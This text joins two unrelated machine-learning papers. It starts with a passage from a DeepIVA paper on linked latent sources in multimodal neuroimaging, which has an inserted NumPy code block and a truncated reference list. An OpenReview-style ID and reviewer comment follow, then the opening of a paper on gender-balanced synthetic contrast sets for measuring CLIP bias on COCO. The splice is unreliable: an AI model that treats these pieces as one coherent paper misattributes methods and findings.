**Synthetic Data Experiment** For each configuration, we run iVAE, MISA and DeepIVA on the same synthetic data with 10 different random seeds. As for hyperparameters, we set an initial learning rate of 0.001 for the iVAE model. The corresponding MISA learning rate is equal to the iVAE learning rate divided by the number of segments, considering that the MISA model is trained on data from each segment separately. A learning rate scheduler reduces the learning rate by a factor of 0.1 if there is no improvement for 20 epochs. We set the maximum number of contiguous iterations to 10 for both models. For synthetic datasets with 4, 8, and 14 segments, we use a batch size of 140, 160 and 160 for the iVAE model, and a batch size of 200, 350 and 700 for the MISA model, respectively. The model parameters are updated by the Adam optimizer (Kingma & Ba, 2014). Each model is trained for 300 epochs until convergence.

### 2.3 Neuroimaging Data Experiment

**Neuroimaging Data** We utilize the UK Biobank dataset (Miller et al., 2016) $\mathbf{X} \in \mathbb{R}^{N \times V \times M}$ including two imaging modalities, T1-weighted sMRI and resting-state fMRI ($M = 2$), from 2907 subjects ($N = 2907$). We preprocess sMRI and fMRI to obtain the gray matter tissue probability segmentation (GM) and amplitude of low frequency fluctuations (ALFF) feature maps, respectively. Each GM or ALFF feature map includes 44318 voxels ($V = 44318$). Here, we use age and sex groups as auxiliary information, assuming that sources within each modality are conditionally independent given the age and sex group. This assumption is based on studies showing the significant impact of age and sex on both brain structure and function (Raz et al., 2004; Good et al., 2001; Ruigrok et al., 2014). We divide the neuroimaging data into 14 segments according to sex and age groups such that the segments approximately follow a uniform distribution (2 sex groups: male and female; 7 age groups: 46–53, 53–57, 57–61, 61–64, 64–67, 67–70, 70–79 years old).

Figure 2: Aggregated RDC matrices across segments from a synthetic dataset (2800 samples, 5 sources, 14 segments). iVAE can correctly identify sources from each modality, while MISA better captures linked sources across both modalities. DeepIVA, which unifies iVAE and MISA, can not only recover unimodal sources, but also capture cross-modal linkage.

**Neuroimaging Data Experiment** We first run singular value decomposition on each data modality and choose the number of latent sources $C$ based on variance explained. We next apply multimodal group principal component analysis (MGPCA) on the two data modalities (sMRI and fMRI) to reduce the feature dimension from 44318 voxels to $C$ common sources. After that, the transformation is applied separately to each dataset in order to obtain modality-specific reductions. We then run iVAE, MISA and DeepIVA on the reduced data $\mathbf{X}_r \in \mathbb{R}^{N \times C \times M}$, respectively.
During the training process, we use a full batch size of 2907 samples for both iVAE and MISA, an iVAE learning rate of 0.001, a MISA learning rate of $7.14 \times 10^{-5}$, 300 epochs, and 10 iterations per epoch.

### 2.4 Evaluation Metrics

We utilize two metrics, the trimmed mean correlation coefficient between the 25th percentile and the 75th percentile (MCC) and the minimum distance (MD), to evaluate model performance. Unlike MCC, which only measures similarity along the main diagonal after permutation, MD also accounts for off-diagonal (dis)similarity. For each metric, we derive four types of coefficients: 1) a coefficient per modality, per segment; 2) an aggregated coefficient per modality; 3) an aggregated coefficient per segment; 4) a final aggregated coefficient across all modalities and segments.

We first compute the randomized dependence coefficient (RDC) matrix $\mathbf{R}$ (Lopez-Paz et al., 2013) between the recovered sources and the ground-truth sources for each modality and each segment. Note that we compute an RDC matrix for each segment separately, rather than across all segments as is conventionally done. Our segment-specific RDC can more precisely characterize the data within each segment and effectively mitigate the noise introduced when all segments are taken simultaneously. Next, we aggregate the RDC matrices over segments by taking the mean to obtain an RDC matrix $\mathbf{R}^m$ per modality (mean aggregation). We also obtain an aggregated RDC matrix $\mathbf{R}^u$ per segment by taking the minimum across modalities for the entries corresponding to the sorted indices (i.e., the entries along the main diagonal after sorting) from a linear sum assignment problem (LSAP) solver (Crouse, 2016), and then taking the maximum for the remaining entries across all modalities (min-max aggregation). This min-max aggregation penalizes approaches that fail to detect cross-modal linkage, even when unimodal identifiability is high. To compute the final aggregated RDC matrix, we use min-max aggregation of $\mathbf{R}^m$ across modalities. We use the permuted indices from the modality-specific RDC matrix $\mathbf{R}^m$ which yields the lowest MD value as the global sorting indices to sort the other RDC matrices. For each sorted RDC matrix $\mathbf{R}_s$, we compute the MCC, as well as the MD, slightly adjusted from Equation 4 in Nordhausen et al. (2011):

\[ \mathrm{MD}(\mathbf{R}) = \frac{1}{2}\left(1 + \frac{1}{d}\,\mathrm{trace}(\mathbf{R}\mathbf{R}^\top) - \frac{2}{d}\,\mathrm{trace}(\mathbf{R}_s)\right), \]

where $\mathbf{R}$ is the unsorted matrix, $\mathbf{R}_s$ is the sorted matrix, and $d$ is the dimension of $\mathbf{R}$.

3 RESULTS

3.1 DeepIVA Learns Linked and Identifiable Sources from Synthetic Datasets

The aggregated RDC matrices for a synthetic dataset with 2800 samples, 5 sources, and 14 segments from iVAE, MISA, and DeepIVA are shown in Figure 2. The aggregated RDC matrices for datasets with 4 and 8 segments are shown in Appendix B.2, Figures 10 and 11. Columns I and II show the RDC matrices between the ground-truth sources and the recovered sources for the first modality (M1) and the second modality (M2), respectively. If an approach can successfully recover latent sources that match the ground-truth sources, we anticipate that high RDC values align along the main diagonal after column permutation (the same for both modalities). Greater contrast indicates better source identification performance.
Column III shows the RDC matrices of the recovered sources between the two modalities, while column IV shows the RDC matrices of the ground-truth sources between the two modalities. If an approach can successfully identify the cross-modal linkage, high RDC values will be aligned along the main diagonal in column III, matching the ground-truth linkage pattern in column IV. According to Figure 2, we observe that iVAE can identify sources with high RDC values within each modality (M1 MCC: 0.80, M2 MCC: 0.99; row I, columns I and II) but fails to capture cross-modal linkage (MCC: 0.62; row I, column III). By contrast, MISA reveals stronger cross-modal dependence along the main diagonal, suggesting its ability to detect cross-modal linkage (MCC: 0.65; row II, column III). However, MISA cannot fully recover unique unimodal sources (M1 MCC: 0.70, M2 MCC: 0.67; row II, columns I and II). In the first modality (M1), we note that the recovered SCV 1 shows high dependence with both ground-truth SCVs 2 and 3. DeepIVA, which unifies iVAE and MISA, can not only recover unimodal sources (M1 MCC: 0.91, M2 MCC: 0.92; row III, columns I and II) but also shows the strongest cross-modal linkage (MCC: 0.72; row III, column III).

The corresponding MD and MCC measures are presented in Figure 3. The iVAE shows the best performance for the per-modality, per-segment metrics (low MDs, high MCCs). As these metrics only account for identifiability within each modality and each segment (no aggregation), these results again indicate that iVAE can effectively recover segment-specific unimodal sources. We also note that DeepIVA achieves comparable performance to iVAE, suggesting that DeepIVA can also effectively identify sources. The other measures (coefficients per modality, coefficients per segment, and aggregated coefficients) take not only unimodal identifiability but also cross-segment consistency and cross-modal linkage into account. From these metrics, we observe that DeepIVA exhibits superior performance (lowest MDs, highest MCCs) over the other two approaches in all simulation configurations. The aggregated MDs from DeepIVA are consistently lower than those from iVAE and MISA across different segments. Specifically, for 4, 8, and 14 segments, the aggregated MDs from DeepIVA are 68.62%, 49.59%, and 51.26% lower than those from iVAE, respectively. Similarly, the aggregated MDs from DeepIVA are 46.49%, 51.37%, and 44.41% lower than those from MISA for the corresponding segments. Furthermore, the aggregated MCCs from DeepIVA are consistently higher than those from iVAE and MISA. Notably, the aggregated MCCs from DeepIVA are 332.95%, 31.71%, and 88.25% higher than those from iVAE for 4, 8, and 14 segments, respectively. Likewise, the aggregated MCCs from DeepIVA are 22.93%, 34.29%, and 42.36% higher than those from MISA for the respective segments. Additionally, when comparing performance across datasets with 4, 8, and 14 segments, the configuration of 4 segments and 700 samples per segment shows the best source identification performance for the per-modality, per-segment metrics. This suggests that variability in the dataset grows with the number of segments, making the optimization problem harder to solve.

We perform a systematic evaluation of model performance across different data-generating configurations by varying both the problem scale (5, 10, and 15 sources) and the sample size (2800 and 5600 samples). The aggregated MD and MCC metrics are shown in Figure 4.
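Since these comparisons all rest on the MD score from Sec. 2.4, a minimal NumPy sketch of its computation may help; the function name is illustrative, and SciPy's LSAP solver stands in for the sorting step described earlier.

```python
import numpy as np
from scipy.optimize import linear_sum_assignment

def minimum_distance(R: np.ndarray) -> float:
    """MD between an RDC matrix R and the ideal (permuted-identity) pattern.

    Columns are first permuted with the LSAP solver so the strongest
    dependencies land on the main diagonal, then the adjusted equation
    from Sec. 2.4 is evaluated (MD = 0 for a perfect permutation matrix).
    """
    d = R.shape[0]
    _, cols = linear_sum_assignment(-R)   # maximize the diagonal dependencies
    R_sorted = R[:, cols]
    return 0.5 * (1.0 + np.trace(R @ R.T) / d - 2.0 * np.trace(R_sorted) / d)
```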
Remarkably, DeepIVA outperforms iVAE and MISA in every configuration, showcasing its superior performance across all evaluated scenarios. Within each panel, we observe a consistent drop in model performance as the number of latent sources increases, suggesting that the optimization problem becomes more challenging as the latent dimension increases. Across horizontal panels, the DeepIVA performance improves for configurations with 10 and 15 sources when the sample size increases from 2800 to 5600, indicating that a larger sample size is necessary to better recover sources in a harder problem.

3.2 DeepIVA recovers linked neuroimaging sources associated with sex and age

We run iVAE, MISA, and DeepIVA on a multimodal neuroimaging dataset to evaluate their effectiveness on real data. Results from singular value decomposition of the sMRI GM and fMRI ALFF feature maps suggest that the top 15 sources capture a large portion of the variance explained in the data (Appendix C.1, Figure 12), and thus we choose to identify 15 common independent sources. The aggregated RDC matrices across segments between the two neuroimaging modalities are presented in Figure 5. Similar to the simulations, DeepIVA shows the strongest cross-modal dependence along the main diagonal (MCC: 0.46), suggesting that it can better capture linked sources across the two imaging modalities. We then color code the recovered sources from DeepIVA by sex and age groups (Figure 6), and observe noticeable sex clusters (e.g., SCVs 12 and 15) and age clusters (e.g., SCVs 8 and 11), indicating that DeepIVA captures linked sources related to phenotype measures. Furthermore, we fit a separate line for the observations from each segment. If DeepIVA is capable of identifying consistent linked sources across segments, these fitted lines should share similar slopes. Indeed, we note that the slopes of the fitted lines per segment are very consistent for most sources (e.g., SCVs 1 – 9). Color-coded sources from iVAE are less aligned across segments, while those from MISA are not associated with sex and age (Appendix C.2, Figures 13 and 14).

Figure 5: Aggregated RDC matrices across 14 segments of 15 recovered sources between two imaging modalities. DeepIVA captures cross-modal linkage from multimodal neuroimaging data.

Figure 6: DeepIVA linked imaging SCVs associated with sex and age. Row I shows the sex effect (blue: male; red: female). Row II shows the aging effect (cold colors: younger groups; warm colors: older groups). Row III shows fitted lines from each segment (blue: male; red: female; light: younger group; dark: older group).

4 DISCUSSION

Summary We propose a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), to learn linked and identifiable latent sources that are nonlinearly mixed across multiple data modalities. DeepIVA unifies iVAE and MISA, and exhibits the unique advantages of each approach, specifically unimodal source identification from iVAE as well as cross-modal linkage detection from MISA. We demonstrate that DeepIVA can recover linked and identifiable sources from multiple synthetic datasets. Moreover, we show that DeepIVA reveals biologically meaningful linked sources from a large multimodal neuroimaging dataset.

Limitations DeepIVA assumes that sources are conditionally independent given the auxiliary variable to achieve identifiability, as it utilizes the iVAE objective. However, there may not be sufficient information about such an auxiliary variable in real data.
Though we obtain sources related to age and sex groups, the true data-generating process remains unknown in the neuroimaging data.

Future Work We plan to extend our proposed method from nonlinear IVA problems to nonlinear ISA problems, aiming to capture source dependence by leveraging higher-dimensional subspaces. It is also worth exploring approaches that do not require side information, such as applying structural sparsity (Zheng et al., 2022), learning latent clusters (Willetts & Paige, 2021; Jiang et al., 2016), or using a Gaussian mixture prior and a deep ReLU/Leaky-ReLU network (Kivva et al., 2022).

REFERENCES

Anees Abrol, Zening Fu, Mustafa Salman, Rogers Silva, Yuhui Du, Sergey Plis, and Vince Calhoun. Deep learning encodes robust discriminative neuroimaging representations to outperform standard machine learning. *Nature Communications*, 12(1):1–17, 2021.

Tülay Adali, Matthew Anderson, and Geng-Shen Fu. Diversity in independent component and vector analyses: Identifiability, algorithms, and applications in medical imaging. *IEEE Signal Processing Magazine*, 31(3):18–33, 2014.

Galen Andrew, Raman Arora, Jeff Bilmes, and Karen Livescu. Deep canonical correlation analysis. In *International Conference on Machine Learning*, pp. 1247–1255. PMLR, 2013.

Vince D Calhoun and Jing Sui. Multimodal fusion of brain imaging data: a key to finding the missing link(s) in complex mental illness. *Biological Psychiatry: Cognitive Neuroscience and Neuroimaging*, 1(3):230–244, 2016.

J-F Cardoso. Multidimensional independent component analysis. In *Proceedings of the 1998 IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP'98 (Cat. No. 98CH36181)*, volume 4, pp. 1941–1944. IEEE, 1998.

Pierre Comon. Independent component analysis, a new concept? *Signal Processing*, 36(3):287–314, 1994.

David F Crouse. On implementing 2D rectangular assignment algorithms. *IEEE Transactions on Aerospace and Electronic Systems*, 52(4):1679–1696, 2016.

Catriona D Good, Ingrid S Johnsrude, John Ashburner, Richard NA Henson, Karl J Friston, and Richard SJ Frackowiak. A voxel-based morphometric study of ageing in 465 normal adult human brains. *Neuroimage*, 14(1):21–36, 2001.

Luigi Gresele, Paul K Rubenstein, Arash Mehrjou, Francesco Locatello, and Bernhard Schölkopf. The incomplete Rosetta Stone problem: Identifiability results for multi-view nonlinear ICA. In *Uncertainty in Artificial Intelligence*, pp. 217–227. PMLR, 2020.

Aapo Hyvarinen and Hiroshi Morioka. Unsupervised feature extraction by time-contrastive learning and nonlinear ICA. *Advances in Neural Information Processing Systems*, 29, 2016.

Aapo Hyvärinen and Petteri Pajunen. Nonlinear independent component analysis: Existence and uniqueness results. *Neural Networks*, 12(3):429–439, 1999.

Aapo Hyvarinen, Hiroaki Sasaki, and Richard Turner. Nonlinear ICA using auxiliary variables and generalized contrastive learning. In *The 22nd International Conference on Artificial Intelligence and Statistics*, pp. 859–868. PMLR, 2019.

Zhuxi Jiang, Yin Zheng, Huachun Tan, Bangsheng Tang, and Hanning Zhou. Variational deep embedding: An unsupervised and generative approach to clustering. *arXiv preprint arXiv:1611.05148*, 2016.

Ilyes Khemakhem, Diederik Kingma, Ricardo Monti, and Aapo Hyvarinen. Variational autoencoders and nonlinear ICA: A unifying framework. In *International Conference on Artificial Intelligence and Statistics*, pp. 2207–2217. PMLR, 2020.

Taesu Kim, Torbjørn Eltoft, and Te-Won Lee.
Independent vector analysis: An extension of ICA to multivariate components. In *International Conference on Independent Component Analysis and Signal Separation*, pp. 165–172. Springer, 2006.

Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014.

Diederik P Kingma and Max Welling. Auto-encoding variational Bayes. *arXiv preprint arXiv:1312.6114*, 2013.

Bohdan Kivva, Goutham Rajendran, Pradeep Ravikumar, and Bryon Aragam. Identifiability of deep generative models without auxiliary information, 2022.
FwdnG0xR02
In this work, the authors only adopt the COCO Captions dataset for the task and gender as the debiased attribute. It would be more convincing if the authors provided a discussion and empirical results on how the insights drawn from this work also apply to other datasets and attributes.
Balancing the Picture: Debiasing Vision-Language Datasets with Synthetic Contrast Sets

Anonymous authors Paper under double-blind review

Abstract

Vision-language models are growing in popularity and public visibility as tools to generate, edit, and caption images at scale, but their outputs can perpetuate and amplify societal biases learned during pre-training on uncurated image-text pairs from the internet. Although debiasing methods have been proposed, we argue that these measurements of model bias lack validity due to dataset bias. We demonstrate there are spurious correlations in COCO Captions, the most commonly used dataset for evaluating bias, between background context and the gender of people in-situ. This is problematic because commonly-used bias metrics (such as Bias@K) rely on per-gender base rates. To address this issue, we propose a novel dataset debiasing pipeline to augment the COCO dataset with synthetic, gender-balanced contrast sets, where only the gender of the subject is edited and the background is fixed. As existing image editing methods have limitations and sometimes produce low-quality images, we introduce a method to automatically filter the generated images based on their similarity to real images. Using our balanced synthetic contrast sets, we benchmark bias in multiple CLIP-based models, demonstrating how metrics are skewed by imbalance in the original COCO images. Our results indicate that the proposed approach improves the validity of the evaluation, ultimately contributing to a more realistic understanding of bias in CLIP.

1 Introduction

Vision-Language Models (VLMs) are rapidly advancing in capability and have witnessed a dramatic growth in public visibility: DALL-E [Ramesh et al., 2021] has more than 1.5 million users creating over 2 million images a day; the Discord channel for MidJourney [MidJourney, 2023] hosts over two million members [Salkowitz, 2022]; and shortly after its release, Stability.AI reported that their Stable Diffusion model [Rombach et al., 2022] had over 10 million daily active users [Fatunde & Tse, 2022]. Underpinning these powerful generative models are image-text encoders like CLIP [Radford et al., 2021], which are themselves used for many discriminative tasks, such as video action recognition, open set detection and segmentation, and captioning. These encoders are pre-trained on large-scale internet-scraped datasets. The uncurated nature of such datasets can translate to generated images that risk inflicting a range of downstream harms on their end users and society at large – from bias and negative stereotypes, to nudity and sexual content, or violent or graphic imagery [Birhane et al., 2021; Cherti et al., 2022]. In light of these issues, coupled with the growing use of generative AI, it is vital to reliably benchmark the bias in VLMs, particularly in the image-text encoders. A small emerging body of work attempts to measure bias in VLMs [Agarwal et al., 2021; Berg et al., 2022; Chuang et al., 2023], or to debias their feature representations [Berg et al., 2022; Chuang et al., 2023]. Yet the legitimacy of this work critically depends on both a suitable evaluation metric and an evaluation dataset to accurately depict the bias in pre-trained model weights and reliably signal whether debiasing attempts have been successful.
The predominant focus on model-centric debiasing methods has overshadowed two main challenges associated with datasets and metrics: (i) the common use of cropped face datasets, such as FairFace [Kärkkäinen & Joo, 2021], falls short because excluding contextual background presents an inaccurate and unreliable assessment of bias in natural images; and (ii) even if natural, open-domain images containing contextual clues are used, they are unbalanced by identity attribute representation within contexts. This is problematic because commonly-used bias metrics, such as Bias@K, are affected by the naturally-occurring distribution of images. Thus, while using contextual images is desirable, it comes at the cost of spurious correlations, affecting the reliability of bias metrics.

In this paper, we argue that these confounding factors arising from the interaction of metric choice and biased datasets paint an unreliable picture when measuring model bias in VLMs. To counter these issues, we propose a synthetic pipeline for debiasing a dataset into contrast sets balanced by identity attributes across background contexts. Our pipeline draws on the success of contrast sets in NLP [Gardner et al., 2020] and leverages recent advances in controllable image editing and generation [Brooks et al., 2022]. We illustrate our approach with a focus on gender bias and define a contrast set as containing pairs of images from COCO [Chen et al., 2015] where each image ID has two synthetically-edited versions (one man, one woman) where the background is fixed and only the person bounding box is edited.

We make three key contributions: (1) We demonstrate spurious correlations in the COCO dataset between gender and context, and show their problematic effects when used to measure model bias (Sec. 3); (2) We present the GENSYNTH dataset, built from a generative pipeline for synthetic image editing, and a filtering pipeline using KNN with real and synthetic images to control for the quality of the generated images (Sec. 4); (3) We benchmark CLIP models [Radford et al., 2021; Wang et al., 2021a] on our GENSYNTH dataset, which has no spurious correlations, and cast doubt on the effectiveness of debiasing methods (Sec. 5).

Our findings demonstrate that debiasing a dataset with synthetic contrast sets can avoid spurious correlations and more reliably measure model bias. While synthetically-edited data has promise in (i) preserving the privacy of subjects included in vision datasets, and (ii) adding controllability to the dataset features, it also risks introducing a real-synthetic distribution shift, and stacking the biases of various generative models may essentialise representations of gender (see Sec. 6). Despite these early-stage limitations, this work starts a conversation about the importance of the interaction of dataset features with bias metrics, ultimately contributing to future work that paints a more accurate and balanced picture of identity-based bias in VLMs.

2 RELATED WORKS

**Defining Fairness and Bias.** Fairness is a complex, context-dependent concept [Mehrabi et al., 2021; Verma & Rubin, 2018]. Here, we adopt a narrow definition where no group is advantaged or disadvantaged based on the protected attribute of gender in retrieval settings [Friedrich et al., 2023; Hendricks et al., 2018]. The metrics employed in this paper, Bias@K [Wang et al., 2021a] and Skew@K [Geyik et al., 2019], are used to assess the disparity in distribution between search results and desired outcomes.
In this work, we assume activities such as dancing, skateboarding, or laughing would not have a strong gendered prior, and thus the desired distribution is one where all protected attributes have an equal chance of being returned for a query that does not explicitly mention gender.\footnote{In certain specific contexts, for example, pregnant or breastfeeding women, we may not necessarily want an equal distribution of masculine and feminine images to be returned, though we must be careful to not conflate biological gender and gender identity (see Sec. 6).}

**Measuring Model Bias.** Measuring bias in VLMs is a growing area of research [Luccioni et al., 2023]. Early work measures the misclassification rates of faces into harmful categories [Agarwal et al., 2021]. Several works measure outcome bias for text-to-face retrieval [Berg et al., 2022; Chuang et al., 2023; Seth et al., 2023], though it is unclear how such measurements made on cropped face datasets generalise to real-world settings. For gender fairness in open-domain images, COCO Captions [Chen et al., 2015] is a standard benchmark for cross-modal retrieval [Wang et al., 2021a, 2022] and image captioning [Hendricks et al., 2018; Zhao et al., 2021].

**Dataset Bias.** Datasets, including those used for bias evaluation, have their own biases from curation and annotation artefacts. Image datasets have been found to include imbalanced demographic representation [Buolamwini & Gebru, 2018; De Vries et al., 2019; Torralba & Efros, 2011; Wang & Russakovsky, 2023; Wang et al., 2019; Zhao et al., 2021], stereotypical portrayals [Caliskan et al., 2017; Schwemmer et al., 2020; van Miltenburg, 2016], or graphic, sexually-explicit, and other harmful content [Birhane et al., 2021]. Similar to [Meister et al., 2022; Wang & Russakovsky, 2023], we identify spurious gender correlations in the COCO Captions dataset and show this renders the dataset unsuitable for current bias retrieval metrics. Techniques to reduce dataset biases range from automatic [Schuhmann et al., 2022] to manual filtering [Yang et al., 2020] of harmful images, such as those containing nudity [Schuhmann et al., 2022], toxicity, or personal and identifiable information [Asano et al., 2021]. Yet, these filters cannot identify subtle stereotypes and spurious correlations present in open-domain images – making it difficult to curate a wholly unbiased natural image dataset [Meister et al., 2022].

**Mitigating Dataset Bias with Synthetic Data.** Deep networks need large amounts of labeled data, prompting the creation of synthetic datasets for various computer vision tasks [Dosovitskiy et al., 2015; Johnson et al., 2017; Michieli et al., 2020; Song et al., 2017]. More recently, progress in generative models [Ramesh et al., 2021; Rombach et al., 2022; Saharia et al., 2022] has enabled methods to synthetically generate training data [Brooks et al., 2022; Li et al., 2022; Peebles et al., 2022; Zhai & Wu, 2018]. Similarly, text-guided editing methods [Brooks et al., 2022; Hertz et al., 2022; Tumanyan et al., 2022] offer scalable and controllable image editing, potentially enhancing dataset fairness and removing issues related to existing spurious correlations. Several works propose the use of synthetic datasets for mitigating dataset bias, such as with GANs [Sattigeri et al., 2019] or diffusion models [Friedrich et al., 2023].
However, synthetic or generated data may not necessarily represent underlying distributions of marginalised groups within populations and thus still unfairly disadvantage certain groups [Altman, 2021; Belgodere et al., 2023; Bhanot et al., 2021; Lu et al., 2023]. To combat these risks, fairness in generative models is an area gaining popularity: StyleGAN [Karras et al., 2019] has been used to edit images on a spectrum, rather than using binary categories; Hermes [2022]; Friedrich et al. [2023] use human feedback to guide diffusion models to generate diverse human images; and Kim et al. [2022] learn to transfer age, race and gender across images. Similar to our work, GAN-based frameworks [Denton et al., 2019; Ramaswamy et al., 2021] edit an existing face dataset to equalise attributes and enforce fairness. Our work extends this approach to open-domain images, introducing an automatic filtering technique for improving the quality of edits. To our knowledge, we are the first to propose image editing of open-domain images for fairness. Our work is also inspired by the use of contrast sets in NLP [Gardner et al., 2020], which have been used to alter data by perturbing demographics (race, age, gender) in order to improve fairness [Qian et al., 2022]. We use synthetically-generated contrast sets by augmenting both the textual and visual input to CLIP, for a more accurate evaluation of VLM bias. ### 3 Measuring Gender Bias on Natural Images While prior works make in-depth comparisons between models, and even metrics [Berg et al., 2022], there is a dearth of research investigating whether natural image datasets, with their own biased and spurious correlations, are suitable benchmarks to measure bias in VLMs. In this section, we investigate the extent of dataset bias from spurious correlations in COCO (Sec. 3.3) and its effect on reliably measuring model bias (Sec. 3.4). #### 3.1 Preliminaries We first define the bias metrics and the framework used to measure model bias on image-caption data. **Bias@K** [Wang et al., 2021a] measures the proportions of masculine and feminine images in the retrievals of a search result with a gender-neutral text query. For an image $I$, we define a function $g(I) = \text{male}$ if there are only individuals who appear as men in the image, and $g(I) = \text{female}$ if there are only individuals who appear as women. Given a set of $K$ retrieved images $\mathcal{R}_K(q)$ for a query $q$, we count the images of apparent men and women as: $$N_{\text{male}} = \sum_{I \in \mathcal{R}_K(q)} \mathbb{1}[g(I) = \text{male}] \quad \text{and} \quad N_{\text{female}} = \sum_{I \in \mathcal{R}_K(q)} \mathbb{1}[g(I) = \text{female}].$$ We define the gender bias metric as: $$\delta_K(q) = \begin{cases} 0, & N_{\text{male}} + N_{\text{female}} = 0 \\ \frac{N_{\text{male}} - N_{\text{female}}}{N_{\text{male}} + N_{\text{female}}}, & \text{otherwise}. \end{cases}$$ For a whole query set $Q$, we define: $$\text{Bias}@K = \frac{1}{|Q|} \sum_{q \in Q} \delta_K(q).$$ (1) Skew@K \cite{berg2022bias, geyik2019gender} measures the difference between the desired proportion of image attributes in \( R_K(q) \) for the query \( q \) and the actual proportion. Let the desired proportion of images with attribute label \( A \) in the set of retrieved images be \( p_{d,q,A} \in [0, 1] \) and the actual proportion be \( p_{R(q),q,A} \in [0, 1] \). 
The Skew@K of \( R(q) \) for an attribute label \( A \in \mathcal{A} \) is:

\[ \text{Skew@K}(R(q)) = \ln \frac{p_{R_K(q),q,A}}{p_{d,q,A}}, \]

where the desired proportion \( p_{d,q,A} \) is the actual attribute distribution over the entire dataset. A disadvantage of Skew@K is that it only measures bias with respect to a single attribute at a time and must be aggregated to give a holistic view of the bias over all attributes. We follow [Berg et al., 2022] and take the maximum Skew@K among all attribute labels \( A \) of the images for a given text query \( q \):

\[ \text{MaxSkew@K}(R(q)) = \max_{A_i \in \mathcal{A}} \text{Skew}_{A_i}(R(q)), \]

which gives us the “largest unfair advantage” [Geyik et al., 2019] belonging to images within a given attribute. In our work, a MaxSkew@K of 0 for the attribute gender and a given text query \( q \) implies that men and women are equally represented in the retrieved set of \( K \) images \( R_K(q) \). We ignore all images with undefined attribute labels (in this case gender) when measuring MaxSkew@K.

COCO is a dataset of 118k images with detection, segmentation, and caption annotations, covering 80 distinct categories, including people [Chen et al., 2015; Lin et al., 2014]. Each image has five captions written by different human annotators. COCO is commonly used to measure gender bias in VLMs in tandem with the Bias@K metric [Chuang et al., 2023; Wang et al., 2021a; Wang et al., 2022].

### 3.2 Gendered Captions and Images in COCO

The bias metrics defined in Sec. 3.1 require gender attribute labels for each image and gender-neutral text queries, but these are not naturally present in captioned image data such as COCO. We describe the steps to automatically label gender for images and to neutralise gender information in captions.

**Extracting Image Gender Labels from Captions.** We assign a gender label to each COCO image, following prior work [Wang et al., 2021a]. For each image, we concatenate all five captions into a single paragraph. If the paragraph contains only feminine words and no masculine words, the image is assigned a female label, and vice versa. If the paragraph contains words from both or neither genders, it is labeled as undefined. The full list of gendered words is detailed in the Appendix. Using this procedure, we implement the function \( g \) in Sec. 3.1. The COCO 2017 train set contains 118,287 images, of which 30,541 (25.8%) are male, 11,781 (9.9%) are female, and 75,965 (64.2%) are undefined. The COCO 2017 validation set contains 5,000 images, of which 1,275 (25.5%) are male, 539 (10.8%) female, and 3,186 (63.7%) undefined. This procedure gives high precision in the gender pseudo-label, as any ambiguous samples are rejected. However, images may be incorrectly labeled as undefined (lower recall) due to, for example, misspelling of the gendered words in the human-annotated captions or omission of rarer gendered terms in our keyword list.

**Constructing Gender-Neutral Captions.** We construct gender-neutral captions by replacing gendered words with neutral ones, e.g. “man” or “woman” become “person”, and the sentence “A man sleeping with his cat next to him” becomes “A person sleeping with their cat next to them”. The full mapping of gender-neutral words and more examples of original and neutralised captions are in the Appendix.
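With gender labels and neutralised queries in place, the two retrieval metrics of Sec. 3.1 can be made concrete. The sketch below is illustrative rather than the authors' implementation: the function names are hypothetical, gender labels are assumed to be strings, and undefined labels are ignored as described above.

```python
import numpy as np

def bias_at_k(retrieved_genders: list, K: int) -> float:
    """delta_K for one query: (N_male - N_female) / (N_male + N_female)
    over the top-K retrieved images; 0 if neither gender is present."""
    top = retrieved_genders[:K]
    n_m = sum(g == "male" for g in top)
    n_f = sum(g == "female" for g in top)
    return 0.0 if n_m + n_f == 0 else (n_m - n_f) / (n_m + n_f)

def max_skew_at_k(retrieved_genders: list, desired: dict, K: int) -> float:
    """Largest ln(actual / desired proportion) over attribute labels for one
    query, e.g. desired = {"male": 0.5, "female": 0.5}; images with labels
    outside `desired` (i.e. undefined) are ignored."""
    top = [g for g in retrieved_genders[:K] if g in desired]
    skews = []
    for attr, p_desired in desired.items():
        p_actual = sum(g == attr for g in top) / max(len(top), 1)
        if p_actual > 0:                      # skip empty attributes (ln 0)
            skews.append(np.log(p_actual / p_desired))
    return max(skews) if skews else 0.0
```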
### 3.3 Identifying Spurious Correlations with Gender

As reported above, COCO contains more than twice as many male images as it does female ones. This imbalance will inevitably affect retrieval-based bias metrics, as there will be more male images in the retrievals. One naive way to fix this is to undersample the male images in order to arrive at a Balanced COCO dataset. However, ensuring an equal distribution of demographic attributes does not necessarily ensure the dataset is unbiased as a whole. Spurious correlations can result in subsets of the data being highly correlated with certain attributes. Here we explore whether, for certain contexts in the COCO dataset, e.g., skateboarding, one gender is over-represented. We take two approaches to demonstrate these spurious correlations.

Figure 1: t-SNE clusters ($M = 20$) of gender-neutralised caption embeddings. Each cluster is manually assigned a name, then coloured and labelled according to its male over-representation factor. The male over-representation factor is the difference between the percentage of male images in the particular cluster and the percentage of male images overall in the dataset.

**K-means Clusters with Caption Embeddings.** First, we find semantic clusters of captions and evaluate the gender balance within them. For every image $I_n$, we embed its gender-neutralised captions $C^k_n$, where $k = \{1, \ldots, K\}$ indexes the $K$ captions of the image, with RoBERTa [Liu et al., 2019] to get features $f^k_n$. We average the features to get $f_n = \frac{1}{K} \sum_{k=1}^{K} f^k_n$. Next, we cluster the features $f_n, n = \{1, \ldots, N\}$ into $M = 20$ clusters with K-Means. Finally, for each cluster, we extract salient words using Latent Dirichlet Allocation (LDA) and assign a manually-defined cluster label. In Fig. 1, we show a t-SNE representation of the discovered clusters, together with the degree of male over-representation. We see that men are over-represented in sports-related concepts, whereas women are over-represented in scenes in kitchens, bathrooms, streets, and parks. For a comparison of this analysis to a keyword-based analysis, and a list of all discovered classes and salient words according to LDA, please refer to the Appendix.

